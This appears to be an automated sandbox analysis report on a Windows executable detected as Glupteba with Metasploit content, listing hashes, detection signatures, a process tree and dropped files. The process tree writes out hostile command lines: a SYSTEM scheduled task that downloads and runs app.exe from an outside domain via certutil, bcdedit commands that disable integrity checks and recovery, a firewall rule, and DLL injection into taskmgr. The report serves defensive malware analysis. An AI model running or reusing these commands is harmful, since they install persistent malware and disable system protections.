Analysis
max time kernel: 0s
max time network: 132s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 21/01/2024, 17:38
Static task: static1
Behavioral task: behavioral1
Sample: 6da0370835d68a8974fcb588fecb3fbf.exe
Resource: win7-20231129-en
General
-
Target
6da0370835d68a8974fcb588fecb3fbf.exe
-
Size
4.4MB
-
MD5
6da0370835d68a8974fcb588fecb3fbf
-
SHA1
6c791854b7146f5ef9f34b7c33e78242ca575e8c
-
SHA256
fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
-
SHA512
9212208b0c5deeb3484f702182a2a3baf8c788380c6314af97db1e60455fd8c2e53a94f7fad849791c2d50b1db167e61a1c548893c459172f6b6f58c4954b5ed
-
SSDEEP
98304:pP68pQVjSwUHjLEvtVWkxOONscVqC/lgDtSN8xjwDpBITS:p68+VGhc1dxOOzwtS+jiTITS
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
Glupteba payload (20 IoCs)
resource yara_rule
behavioral1/memory/3032-2-0x0000000002F30000-0x0000000003857000-memory.dmp family_glupteba
behavioral1/memory/3032-3-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/3032-5-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/3032-6-0x0000000002F30000-0x0000000003857000-memory.dmp family_glupteba
behavioral1/memory/2528-9-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2528-19-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-22-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-211-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-216-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-217-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-218-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-271-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-301-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-302-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-303-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-328-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-329-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-330-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-331-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba
behavioral1/memory/2416-332-0x0000000000400000-0x000000000258E000-memory.dmp family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Modifies boot configuration data using bcdedit (14 IoCs)
pid Process
1360 bcdedit.exe
2972 bcdedit.exe
3000 bcdedit.exe
2260 bcdedit.exe
3024 bcdedit.exe
2680 bcdedit.exe
2480 bcdedit.exe
1308 bcdedit.exe
1284 bcdedit.exe
2744 bcdedit.exe
1844 bcdedit.exe
2784 bcdedit.exe
2312 bcdedit.exe
2316 bcdedit.exe

Modifies Windows Firewall (1 TTPs, 1 IoCs)
pid Process
2560 netsh.exe

Possible attempt to disable PatchGuard (2 TTPs)
Rootkits can use kernel patching to embed themselves in an operating system.

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
1320 schtasks.exe
2772 schtasks.exe

GoLang User-Agent (3 IoCs)
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc
HTTP User-Agent header 32 Go-http-client/1.1
HTTP User-Agent header 33 Go-http-client/1.1
HTTP User-Agent header 39 Go-http-client/1.1
Processes
- C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
  PID: 3032
  - C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
    PID: 2528
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      PID: 2444
      - C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Signature: Modifies Windows Firewall
        PID: 2560
    - C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe /197-197
      PID: 2416
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        Signature: Creates scheduled task(s)
        PID: 1320
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Signature: Creates scheduled task(s)
        PID: 2772
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        PID: 2612
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
          Signature: Modifies boot configuration data using bcdedit
          PID: 1360
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
          Signature: Modifies boot configuration data using bcdedit
          PID: 2972
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
          Signature: Modifies boot configuration data using bcdedit
          PID: 3000
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
          Signature: Modifies boot configuration data using bcdedit
          PID: 3024
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -timeout 0
          Signature: Modifies boot configuration data using bcdedit
          PID: 2680
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
          Signature: Modifies boot configuration data using bcdedit
          PID: 2480
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
          Signature: Modifies boot configuration data using bcdedit
          PID: 1308
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
          Signature: Modifies boot configuration data using bcdedit
          PID: 1284
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
          Signature: Modifies boot configuration data using bcdedit
          PID: 2744
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
          Signature: Modifies boot configuration data using bcdedit
          PID: 1844
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
          Signature: Modifies boot configuration data using bcdedit
          PID: 2784
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
          Signature: Modifies boot configuration data using bcdedit
          PID: 2312
        - C:\Windows\system32\bcdedit.exe
          Command line: C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
          Signature: Modifies boot configuration data using bcdedit
          PID: 2316
      - C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        Signature: Modifies boot configuration data using bcdedit
        PID: 2260
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        PID: 2176
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        PID: 928
- C:\Windows\system32\makecab.exe
  Command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab
  PID: 2624
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
  Filesize: 1.3MB
  MD5: f0e11df20b7732e8fa70a359cb661c23
  SHA1: 2d02b0d8c0c6b7bd2e1b90bfaf6e9a0d2c39a2fb
  SHA256: ddcea3218320cdc914a65e9b4b2d3fcc10dd482d1fa9edce8d7d05e3457f06e5
  SHA512: c8eb0d1541e8a7256030b9990a54f27314a1bda82bbe99955dc7afbaec83163d460cc9007153d60aaf2780514700f7a0ab40c7e56001f11fe3a02ffae69c94ec

- C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
  Filesize: 395KB
  MD5: 5da3a881ef991e8010deed799f1a5aaf
  SHA1: fea1acea7ed96d7c9788783781e90a2ea48c1a53
  SHA256: f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
  SHA512: 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

- Filesize: 94KB
  MD5: d98e78fd57db58a11f880b45bb659767
  SHA1: ab70c0d3bd9103c07632eeecee9f51d198ed0e76
  SHA256: 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
  SHA512: aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

- Filesize: 281KB
  MD5: d98e33b66343e7c96158444127a117f6
  SHA1: bb716c5509a2bf345c6c1152f6e3e1452d39d50d
  SHA256: 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
  SHA512: 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

- Filesize: 334KB
  MD5: ee3339f6749c89218df70f883273a8a5
  SHA1: b971f12080009f8de374c223fd3721528c9a8dfa
  SHA256: 4763e68a4c2bffa30f49b70564810915904412f53b2117df9af87a21a1873899
  SHA512: 71852c25b487d367f368bb39f334cc76f06a1726880e1c71071a96809cd43bdb97a2bf5da54c3f1c5225100cf0e7ddf956986c10a4fc82be32f76a4e756d7c29

- Filesize: 130KB
  MD5: 2741c1f51b156c3cc4d8354e7ece80fd
  SHA1: 595ad9adb7bb5a2fa6d0ea702a929fd9e92aae24
  SHA256: c4c5e8302363960a159c38d0cb1e926e6703530f6caf858d4636ca0253213adb
  SHA512: 490d5fb5abaa72b42603bfc2660907dee82234cb0f88760ac9496edfe9c62a3673e979c5a51dbf34da0a9be8a7a4731853f0af51e0bf52863fc55f1cd961f9c8

- Filesize: 591KB
  MD5: e2f68dc7fbd6e0bf031ca3809a739346
  SHA1: 9c35494898e65c8a62887f28e04c0359ab6f63f5
  SHA256: b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
  SHA512: 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

- C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  Filesize: 64KB
  MD5: d71dff97ca86ca16c3db8bdb5285fb35
  SHA1: 271c01246897497d069b81ed37af296cf6c1e498
  SHA256: 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac
  SHA512: 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a

- C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
  Filesize: 1KB
  MD5: a266bb7dcc38a562631361bbf61dd11b
  SHA1: 3b1efd3a66ea28b16697394703a72ca340a05bd5
  SHA256: df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
  SHA512: 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

- C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 38b7eabd6a868cdfebcb09d110c67825
  SHA1: 7225a012527be250763f52d14250ff0556ac8a9e
  SHA256: 42ef174b129710297bdde703f78941a7d711aa5544751fa610fdfc413ea0bfbe
  SHA512: 5655e52d7506b00e40968a1131be1684d8bf09f60e87493d63ed9337f5d90d899ff198c110bbcf2bae594b6f22d126171b3dfeda4538ba456dcac7bbfe18cb41

- C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: fbb403b06bae03197b6d95bd468d8527
  SHA1: 09bb35f55ac81f51375a6122afe0ca4a26bf3800
  SHA256: f50a04c75dc5be1b12a52cb163fd3ff176f24078f78fde575e7ecb3754e1157d
  SHA512: bd35baa4ec3187d5e70d0852853bab4abde2df4a4bd5e2a2ee35399870ec616539046e0bcb92406488bc9618187ea01836e76da02750d52c28534e7b7e1e5015

- C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
  Filesize: 242B
  MD5: d44640c7ac51cc9049e03edeee8b96fd
  SHA1: 37eb0fa6fd118d17b5455317d1ae639e7ef56251
  SHA256: c5def655c89dded84a37a3dbbd84b907680f121dcd5ec20b8ef0823b34d4169b
  SHA512: 4a08b9c4d1908e7541457dd3cc6712c3509443a38053835943b602f2aac74c91f4c544dd0593d029d14b78a9cfcd9e3f0b638bfacfcb544fe129c76a837e1e1b

- Filesize: 75KB
  MD5: 07a8f54a0752a9853479aeb2129f599d
  SHA1: 02d76478c642a21356716ecdf620ec4863936b71
  SHA256: fa1e7fc24766633ae74bfefa9c10c11cc788862b8cfe5f75396b20aa84a4a593
  SHA512: f23bb7376ac31bdcff8a7981dfd7711702113c9159cc7e3ddda520ae0c6f35b768d30755a8e2374196b47edf906dbc6e5d1fadfb5831f263d4c557211f2ad54f

- Filesize: 1.1MB
  MD5: c26036e7be1c7717ff2e3a804b2d75a3
  SHA1: a0ec868a916a4e291b783efa195424955bf11cd9
  SHA256: 95287ab95c5a2acc05c8a01d154de1bf719585fcbfd132416088512d74029e5b
  SHA512: 9f26f47f6acb614b52edcaca0d8c9123475464479c4e6dccd718963163e31b4dcaf624789fd26043f05de4893bf961a12eaa3a1f10d35bc88ae1b18bb10be8fd

- Filesize: 1.2MB
  MD5: e0e462f7394a42e87d3cfa375cd94fc0
  SHA1: 8f9fd17b3716621d937cc8579d44b4b5672365ac
  SHA256: b0193041bf4944a8ab2db47323b9a4e2d26e535cac2be88af6f23ad774a7ed99
  SHA512: 6db6e5386b1db8c31e1529f0e5b933b860d3c25efcc938cd22134ad32431fcc6a7ccaa3ee5c5c699c45f4a673fbbe2dffbd9b67ac7a21acf2f98956f15087d37

- Filesize: 687KB
  MD5: fd785bbb06ce98864a925df95e16b8c5
  SHA1: 03e4cc85670fc80cb6e98029645ea955fd5f2974
  SHA256: 6d7011d41d349a0a28428df0cc114c1ba0238c8060d2298579ccbcc22d629ebe
  SHA512: f0bef8c21c154437503f02bb04e0da1381ab251c4f4b41883c3f46f77b3000f88f2208b3dfe56d76683fa6197be225d891a208c085f0a2b086be8debf0d28891

- Filesize: 377KB
  MD5: bf78afa0bf26d0b7448b2f3a2acc32f4
  SHA1: 9d8ab648e689f0a6ead9878ad33d21c8829b356b
  SHA256: a2148f29b2226818f37ddcc59743cefef0145defad6d4fca74210ca0ecef49dd
  SHA512: 71765cbd6754567987a7bbb451424e78260ad22ad159f9726746ac4db80192f51171818bd0490027bd8c2aff9fffbb3aa043e190e469518b57f97b88ca37024e

- Filesize: 327KB
  MD5: 117b6ea2c794811428fea2fc25eae383
  SHA1: d5673c2832adaa659badc1baa135420fc63ae889
  SHA256: a89e6c0c06c2c8fcc7620d123dc81f1bbd0915c15dfae1e5c9c45af11b446996
  SHA512: 52a20cd725c9ea068e6bae97c59b7716ef6fb844b578b55f16842a9006254a6e59afb25ba7dc0cdace243a576b75c10b8a910afaef526349f9892ab6631eafb3

- Filesize: 553KB
  MD5: 0791570b2d0769f0a251dde143c16bf4
  SHA1: 40805bacf3116e06bd0453de7484858f4e1e7e82
  SHA256: 7e36a77bc6ac8b20b50e036f9b59d09102027435b99874b6431b79b735b0f29f
  SHA512: c431e7fd6c2603f5310ab41dcb6036fa1eb479d5c020d446dc0348bc9a3ed97d31b0046db2e073ca7832c8bfc43c9d9f8a7212959009d9215bc54877400d0c9a

- Filesize: 169KB
  MD5: e5fb512f3dd17d1302f02f000dfe5693
  SHA1: 95529fe6f04aa1039c8795d7550d1446762af009
  SHA256: 5381925c4a34a536ba0c2fa93d391252d91ca5d453768feec133ad547ffe3c79
  SHA512: fec4d96f82b32786dbdafd075b9f940298ba8654fbfa5cb18d14078e0fd95bacb61acdc532058fc71bc46f0824c0eca242641947956495bfc4c8910aadf5dbe9

- Filesize: 433KB
  MD5: 40994b10b6ae95dcef1d22c91cae0ae9
  SHA1: 85459e6b4eefcc0c15df157413a8fe6358dfa4d1
  SHA256: 7dd45d5e762f72da56a5daf0d2bf4d1dc4255dff18422bbba099f7fbabd77d08
  SHA512: e593475b72fb90e3a200a13dfd9540b5f155ee4c38d95cbb0f5db197f2167c7b35911479680c6fa75b36617fcc67fe7398ce670f05d789167372ed1500c64844

- Filesize: 163KB
  MD5: 5c399d34d8dc01741269ff1f1aca7554
  SHA1: e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
  SHA256: e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
  SHA512: 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

- Filesize: 1.2MB
  MD5: 2c763260ff725d955728ac64dadf3958
  SHA1: b335f3a6e525fd9e6ef60467160708d1c57ca545
  SHA256: 227a58c88ea338cf0acaa3693a545880e63fa5bd58a97f09acb1843d88df7cc4
  SHA512: ff2243ef68efb03460d25aabc74883d9c972a013c5d4061aef25d8bfb8eb73a493bcd76320d61c1ce0ecfa3890373cf6c92703a1a2de26f9d2f5c3e909d70cab

- Filesize: 2.5MB
  MD5: d23cab124d8ccf930b2d1fad102fd2a7
  SHA1: 0b13d0dd1c8f66ccb8cb8fb373eb6f7bbaf48781
  SHA256: 09be4c8472334b9ec35bf3c1b97b0a2726e527e30a92408ee1854c1bb445966e
  SHA512: 649b860ff48bf46f91813f7b9e0ad2d1c56610b4f0a6ef5428878cc4fdeb11d7dc6634a5f2e0b27d54504cc8955757e91aecf4581d50b2142e242d9a51d2187b